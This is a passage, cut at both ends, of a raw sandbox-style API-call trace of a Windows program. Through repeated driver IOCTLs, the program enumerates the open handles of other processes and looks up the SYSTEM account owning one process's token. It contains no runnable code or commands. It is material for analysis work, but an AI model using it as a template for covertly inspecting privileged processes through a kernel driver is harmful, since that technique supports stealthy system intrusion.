Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003795a20, HandleInformation=0x0) returned 0x0 [0136.640] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.640] PsReleaseProcessExitSynchronization () returned 0x2 [0136.640] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe6 [0136.640] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa80022b0044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022b0044, ReturnLength=0xfffff88005163508) returned 0x0 [0136.640] ObfDereferenceObject (Object=0xfffffa8003795a20) returned 0x1 [0136.640] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.640] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.640] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.640] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xb6, lpOverlapped=0x0) returned 1 [0136.640] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.640] PsAcquireProcessExitSynchronization () returned 0x0 [0136.640] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0) [0136.640] ObReferenceObjectByHandle (in: Handle=0x600, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002961550, HandleInformation=0x0) returned 0x0 [0136.641] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.641] PsReleaseProcessExitSynchronization () returned 0x2 [0136.641] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe6 [0136.641] ObQueryNameString (in: Object=0xfffffa8002961550, ObjectNameInfo=0xfffffa8002c0f044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002c0f044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.641] ObfDereferenceObject (Object=0xfffffa8002961550) returned 0x2 [0136.641] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.641] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.641] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.641] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xba, lpOverlapped=0x0) returned 1 [0136.641] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.641] PsAcquireProcessExitSynchronization () returned 0x0 [0136.641] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0) [0136.641] ObReferenceObjectByHandle (in: Handle=0x608, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800d8fe370, HandleInformation=0x0) returned 0x0 [0136.641] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.641] PsReleaseProcessExitSynchronization () returned 0x2 [0136.641] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe6 [0136.641] ObQueryNameString (in: Object=0xfffffa800d8fe370, ObjectNameInfo=0xfffffa8002dea044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002dea044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.641] ObfDereferenceObject (Object=0xfffffa800d8fe370) returned 0x2 [0136.641] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.641] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.642] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.642] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x76, lpOverlapped=0x0) returned 1 [0136.642] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.642] PsAcquireProcessExitSynchronization () returned 0x0 [0136.642] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0) [0136.642] ObReferenceObjectByHandle (in: Handle=0x738, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003ad1a30, HandleInformation=0x0) returned 0x0 [0136.642] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.642] PsReleaseProcessExitSynchronization () returned 0x2 [0136.642] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe6 [0136.642] ObQueryNameString (in: Object=0xfffffa8003ad1a30, ObjectNameInfo=0xfffffa8002d63044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002d63044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.642] ObfDereferenceObject (Object=0xfffffa8003ad1a30) returned 0x2 [0136.643] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.644] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.644] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.644] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0136.644] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.644] PsAcquireProcessExitSynchronization () returned 0x0 [0136.644] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0) [0136.644] ObReferenceObjectByHandle (in: Handle=0x740, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003acf070, HandleInformation=0x0) returned 0x0 [0136.644] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.644] PsReleaseProcessExitSynchronization () returned 0x2 [0136.644] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe6 [0136.644] ObQueryNameString (in: Object=0xfffffa8003acf070, ObjectNameInfo=0xfffffa80028f1044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80028f1044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.644] ObfDereferenceObject (Object=0xfffffa8003acf070) returned 0x2 [0136.644] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.644] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.644] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.644] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0136.644] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.644] PsAcquireProcessExitSynchronization () returned 0x0 [0136.644] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0) [0136.644] ObReferenceObjectByHandle (in: Handle=0x744, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003acf280, HandleInformation=0x0) returned 0x0 [0136.645] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.645] PsReleaseProcessExitSynchronization () returned 0x2 [0136.645] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe6 [0136.645] ObQueryNameString (in: Object=0xfffffa8003acf280, ObjectNameInfo=0xfffffa8002ae3044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002ae3044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.645] ObfDereferenceObject (Object=0xfffffa8003acf280) returned 0x2 [0136.645] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.645] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.645] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.645] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0136.645] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.645] PsAcquireProcessExitSynchronization () returned 0x0 [0136.645] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0) [0136.645] ObReferenceObjectByHandle (in: Handle=0x74c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003acfda0, HandleInformation=0x0) returned 0x0 [0136.645] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.645] PsReleaseProcessExitSynchronization () returned 0x2 [0136.645] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe6 [0136.645] ObQueryNameString (in: Object=0xfffffa8003acfda0, ObjectNameInfo=0xfffffa8002c10044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002c10044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.645] ObfDereferenceObject (Object=0xfffffa8003acfda0) returned 0x2 [0136.645] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.645] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.646] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.646] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0136.646] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.646] PsAcquireProcessExitSynchronization () returned 0x0 [0136.646] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0) [0136.646] ObReferenceObjectByHandle (in: Handle=0x750, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003acfb40, HandleInformation=0x0) returned 0x0 [0136.646] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.646] PsReleaseProcessExitSynchronization () returned 0x2 [0136.646] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe6 [0136.646] ObQueryNameString (in: Object=0xfffffa8003acfb40, ObjectNameInfo=0xfffffa8002c12044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002c12044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.646] ObfDereferenceObject (Object=0xfffffa8003acfb40) returned 0x2 [0136.646] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.646] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.646] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.646] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x38, lpOverlapped=0x0) returned 1 [0136.647] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.647] PsAcquireProcessExitSynchronization () returned 0x0 [0136.647] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0) [0136.647] ObReferenceObjectByHandle (in: Handle=0x870, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001fd5d10, HandleInformation=0x0) returned 0x0 [0136.647] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.647] PsReleaseProcessExitSynchronization () returned 0x2 [0136.647] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe6 [0136.647] ObQueryNameString (in: Object=0xfffffa8001fd5d10, ObjectNameInfo=0xfffffa8002cdc044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002cdc044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.647] ObfDereferenceObject (Object=0xfffffa8001fd5d10) returned 0x2 [0136.647] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.647] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.647] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0xc8 [0136.647] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0136.647] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8003654700, HandleInformation=0x0) returned 0x0 [0136.647] ObOpenObjectByPointer (in: Object=0xfffffa8003654700, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000654) returned 0x0 [0136.648] ObfDereferenceObject (Object=0xfffffa8003654700) returned 0x40 [0136.648] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000654, DesiredAccess=0x8, TokenHandle=0xfffffa8010170480 | out: TokenHandle=0xfffffa8010170480*=0xc4) returned 0x0 [0136.648] ZwClose (Handle=0xffffffff80000654) returned 0x0 [0136.648] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.648] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0136.648] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0136.660] CloseHandle (hObject=0xc4) returned 1 [0136.660] CloseHandle (hObject=0xc8) returned 1 [0136.661] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.661] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0136.661] PsLookupProcessByProcessId (in: ProcessId=0x1e8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.661] PsAcquireProcessExitSynchronization () returned 0x0 [0136.661] KeStackAttachProcess (in: PROCESS=0xfffffa8003654700, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003654700, ApcState=0xfffff880051635d0) [0136.661] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80036897a0, HandleInformation=0x0) returned 0x0 [0136.661] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.661] PsReleaseProcessExitSynchronization () returned 0x2 [0136.661] ObfDereferenceObject (Object=0xfffffa8003654700) returned 0x3e [0136.662] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002b7b044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002b7b044, ReturnLength=0xfffff88005163508) returned 0x0 [0136.662] ObfDereferenceObject (Object=0xfffffa80036897a0) returned 0x1 [0136.662] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.662] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.662] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.662] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0136.662] PsLookupProcessByProcessId (in: ProcessId=0x1e8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.662] PsAcquireProcessExitSynchronization () returned 0x0 [0136.662] KeStackAttachProcess (in: PROCESS=0xfffffa8003654700, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003654700, ApcState=0xfffff880051635d0) [0136.662] ObReferenceObjectByHandle (in: Handle=0x88, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80036ff9e0, HandleInformation=0x0) returned 0x0 [0136.662] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.663] PsReleaseProcessExitSynchronization () returned 0x2 [0136.663] ObfDereferenceObject (Object=0xfffffa8003654700) returned 0x3e [0136.663] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8002e15044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002e15044, ReturnLength=0xfffff88005163508) returned 0x0 [0136.663] ObfDereferenceObject (Object=0xfffffa80036ff9e0) returned 0x1 [0136.663] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.663] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.663] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.670] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0136.670] PsLookupProcessByProcessId (in: ProcessId=0x1e8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.670] PsAcquireProcessExitSynchronization () returned 0x0 [0136.670] KeStackAttachProcess (in: PROCESS=0xfffffa8003654700, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003654700, ApcState=0xfffff880051635d0) [0136.670] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003778bc0, HandleInformation=0x0) returned 0x0 [0136.670] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.670] PsReleaseProcessExitSynchronization () returned 0x2 [0136.670] ObfDereferenceObject (Object=0xfffffa8003654700) returned 0x3e [0136.670] ObQueryNameString (in: Object=0xfffffa8003778bc0, ObjectNameInfo=0xfffffa8002b7a044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002b7a044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.670] ObfDereferenceObject (Object=0xfffffa8003778bc0) returned 0x1 [0136.671] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.671] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.671] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.671] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x4c, lpOverlapped=0x0) returned 1 [0136.671] PsLookupProcessByProcessId (in: ProcessId=0x1e8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.671] PsAcquireProcessExitSynchronization () returned 0x0 [0136.671] KeStackAttachProcess (in: PROCESS=0xfffffa8003654700, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003654700, ApcState=0xfffff880051635d0) [0136.671] ObReferenceObjectByHandle (in: Handle=0x1a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003781f20, HandleInformation=0x0) returned 0x0 [0136.671] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.671] PsReleaseProcessExitSynchronization () returned 0x2 [0136.671] ObfDereferenceObject (Object=0xfffffa8003654700) returned 0x3e [0136.671] ObQueryNameString (in: Object=0xfffffa8003781f20, ObjectNameInfo=0xfffffa8002aec044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002aec044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.672] ObfDereferenceObject (Object=0xfffffa8003781f20) returned 0x2 [0136.672] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.672] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.672] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.672] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x4c, lpOverlapped=0x0) returned 1 [0136.672] PsLookupProcessByProcessId (in: ProcessId=0x1e8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.672] PsAcquireProcessExitSynchronization () returned 0x0 [0136.672] KeStackAttachProcess (in: PROCESS=0xfffffa8003654700, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003654700, ApcState=0xfffff880051635d0) [0136.672] ObReferenceObjectByHandle (in: Handle=0x1a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003780a70, HandleInformation=0x0) returned 0x0 [0136.672] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.672] PsReleaseProcessExitSynchronization () returned 0x2 [0136.672] ObfDereferenceObject (Object=0xfffffa8003654700) returned 0x3e [0136.672] ObQueryNameString (in: Object=0xfffffa8003780a70, ObjectNameInfo=0xfffffa8002d68044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002d68044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.673] ObfDereferenceObject (Object=0xfffffa8003780a70) returned 0x1 [0136.673] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.673] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.673] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.673] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x4c, lpOverlapped=0x0) returned 1 [0136.673] PsLookupProcessByProcessId (in: ProcessId=0x1e8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.673] PsAcquireProcessExitSynchronization () returned 0x0 [0136.673] KeStackAttachProcess (in: PROCESS=0xfffffa8003654700, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003654700, ApcState=0xfffff880051635d0) [0136.673] ObReferenceObjectByHandle (in: Handle=0x1a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003781dd0, HandleInformation=0x0) returned 0x0 [0136.673] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.673] PsReleaseProcessExitSynchronization () returned 0x2 [0136.673] ObfDereferenceObject (Object=0xfffffa8003654700) returned 0x3e [0136.673] ObQueryNameString (in: Object=0xfffffa8003781dd0, ObjectNameInfo=0xfffffa8002947044, Length=0x800, ReturnLength=0xfffff88005163550 